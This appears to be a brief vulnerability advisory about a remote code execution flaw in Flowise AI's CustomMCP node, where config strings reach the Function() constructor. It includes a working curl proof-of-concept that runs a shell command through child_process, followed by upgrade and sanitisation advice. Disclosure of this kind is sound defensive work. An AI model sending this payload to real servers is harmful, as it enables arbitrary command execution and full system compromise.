Listen to this Post
The vulnerability exists in the CustomMCP node, which processes user-supplied configuration strings for connecting to an external server. The `convertToValidJSONString` function takes the `mcpServerConfig` input and passes it directly to the JavaScript `Function()` constructor via Function('return ' + inputString)(). This constructor dynamically evaluates and executes the provided string as code within the Node.js runtime. Since no sanitization or security validation is performed on the input, an attacker can supply a malicious string that, when executed, gains access to powerful built-in modules like `child_process` and fs. This allows for arbitrary command execution and full system compromise, as the code runs with the same privileges as the Flowise application itself.
Platform: Flowise AI
Version: <=1.7.0
Vulnerability : RCE
Severity: Critical
date: 2024-11-01
Prediction: 2024-11-15
What Undercode Say:
`curl -X POST http://localhost:3000/api/v1/node-load-method/customMCP -H “Content-Type: application/json” -H “Authorization: Bearer [bash]” -d ‘{“loadMethod”:”listActions”,”inputs”:{“mcpServerConfig”:”({x:(function(){const cp=process.mainModule.require(\”child_process\”);cp.execSync(\”touch /tmp/poc\”);return 1;})()})”}}’`
How Exploit:
Malicious config string passed to `/api/v1/node-load-method/customMCP` endpoint is executed by `Function()` constructor, granting RCE.
Protection from this CVE
Upgrade to version 1.7.1. Sanitize all user inputs. Avoid using `Function()` constructor with untrusted data. Implement strict input validation for the CustomMCP node.
Impact:
Full system compromise, arbitrary command execution, sensitive data exfiltration, complete server takeover.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

